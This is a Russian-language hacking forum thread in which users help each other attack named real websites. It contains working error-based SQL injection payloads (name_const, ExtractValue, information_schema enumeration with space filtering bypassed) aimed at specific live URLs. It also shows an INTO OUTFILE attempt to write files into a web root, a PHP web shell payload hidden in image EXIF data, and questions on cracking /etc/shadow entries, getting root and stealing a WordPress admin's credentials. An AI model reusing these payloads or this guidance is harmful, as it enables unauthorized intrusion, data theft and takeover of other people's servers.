во первых: кодирование ковычек нельзя использовать в INTO OUTFILE. Ибо мускул требует строку, а следовательно должны быть кавычки. Не путайте то, что выдает мускул в выводе - там где можно делать тот же хекс и то что на инпуте попадает в сам мускул. Далее: Права на директории только самым непосредственным методом можно узнать - пробовать в них заливать. Конечно есть ряд стандартных директорые имеют больший шанс иметь права на запись как -то : /temp,/upload etc. Но! Смотрите сразу под каким юзером живет веб-сервер и используется ли UID-GID(suexec, ITK etc). Могут иметь место ситуации , когда сам PHP может иметь полный доступ к директориям и папкам, а USER MYSQL через которого ты делаешь OUTFULE - нет. Ищи интерфейсы для работу с mysql , а-ля PHPMYADMIN. Проверяй удаленный коннект, пробуй через reverse-IP.
Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать. Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?
А, вспомнил! su username Выполняю, но мне пишет вот это: -------------- Я не могу зайти под другим пользователем... Что делать? Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158
Судя по всему через backconnect ? Это означает, что текущая сессия не привязана к псевдотерминалу. Пробуй ssh youruser@localhost. Но не файт что получится, так как есть ряд граничных условий.
http://www.girlsweb.org/registerNew.php поле email и username вроде как уязвимы...получилось раскрутить только как blind-sql inj...возможно ли с 1-2 запросов залить шелл? magic_quotes_gpc = On
http://allinstyle.ru/?index.php'or(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and(1)='1 http://discoverytravel.ru/next.php?pid=2'or(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1 Видно в ОПЕРЕ. Вот подобного рода инъекции с запретами на пробелы, кроме версии базы, можно что-нибудь выводить? Tiger ответил, спасибо ему, но а как дальше? мануалы предательски молчат. пичалька. Они вообще юзабельны? Или ограничиваться номером версии это уже найс?
asiaman Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version())))and'1 Ну или: https://rdot.org/forum/showpost.php?p=20287&postcount=12
Про ф-цию ExtractValue, спасибо. Она работает в старших версиях. Но вот в http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1 как быть? Вариант Code: предложил использовать `` в name_const в Code: 1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1 выдает ошибку. З.Ы. Ваши ответы я вообще себе в блокнот сразу копирую. Очень полезные, уникальны (по крайней мере для меня) и часто универсальные. Спасибо. ________________________________________________ Например, если ругается на этот символ ` , т.е. https://rdot.org/forum/showpost.php?p=20287&postcount=12 не проходит в запросе этот символ. На что можно его заменить?
asiaman Там же написано. Запросы надо посылать не через браузер. Результат: Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.<br />Duplicate column name 'TABLE_NAME' Данная реализация не идеальна, но имеет место быть. В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).
tnx а как Вам такая реализация? 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1 в смысле используя like и data_length
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where(table_name)like('TABLE%')))))='1 error - Subquery returns more than 1 row http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where(table_name)like('VIEWS%')))))='1 error - XPATH syntax error: ':information_schema.VIEWS' Опять же, все упирается в LIMIT.
от части. оператор like - это смысловой оператор. но с грехом по пополам - можно работать. хотя, я посмотрю. где-то увидел интересный шаблон, там через chr обходит все и даже пробелы работают. __________ погарячился. Code: You don't have permission to access
Помогите пожалуйста с WP 2.9.2 при переходе на _tp://www.site.com/?p=0 открывает главную страницу, но url в строке не меняется на _tp://www.site.com/ А при переходе на _tp://www.site.com/?p=1 выдаёт и как мне подобраться к базе, вытащить лог. пасс. админа? Заранее спасибо
Вопрос следующего плана: заливка шелла через картинку. Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял <?system($_GET[cmd])?> и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка. Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал. Прошу подсказать варинты. Или забить?
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+ http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+ что не так?Помогите докрутить.
ты пути от фонаря нарисовал? там ковычка вызывает ошибку, тоесть фиг ты запишешь чтото в файл, да и права врятли есть вариант искать на сайте инклуд, иначе никак
